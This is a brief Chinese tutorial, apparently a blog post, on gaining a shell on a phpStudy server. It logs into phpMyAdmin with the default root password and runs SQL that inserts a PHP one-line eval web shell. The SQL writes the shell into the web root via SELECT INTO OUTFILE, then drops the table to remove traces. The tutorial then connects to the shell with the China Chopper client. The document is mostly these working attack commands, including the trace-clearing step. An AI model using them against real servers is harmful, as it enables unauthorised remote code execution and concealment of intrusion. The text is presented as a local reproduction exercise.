复现phpstudy数据库探针过程获取sh

探针过程获取sh"/>

复现phpstudy数据库探针过程获取sh

使用数据库将一句话发送到phpstudy本地进行连接原理。

1：安装并打开phpstudy，启动服务：

2：进入phpMyadmin数据库账户密码默认root，登录

3：选择或者创建一个数据库：
这里选择了test数据库，选择sql语句，执行以下命令：
create table ma (cmd text NOT NULL);//创建名为ma的表，不能为空
insert into ma (cmd) values ('<?php @eval($_POST[123])?>');//在ma表中插入一句话木马
select cmd from ma into outfile 'D:/phpstudy/WWW/a.php';//查找www目录，将一句话木马写入。
drop table if exists ma;//清楚痕迹。
选择执行命令：

4：这时我们的www目录下已经插入了名为a.php的目录：

4打开中国菜刀进行连接，在这里要注意php版本最好是5版本，7版本无法进行连接。：

连接成功。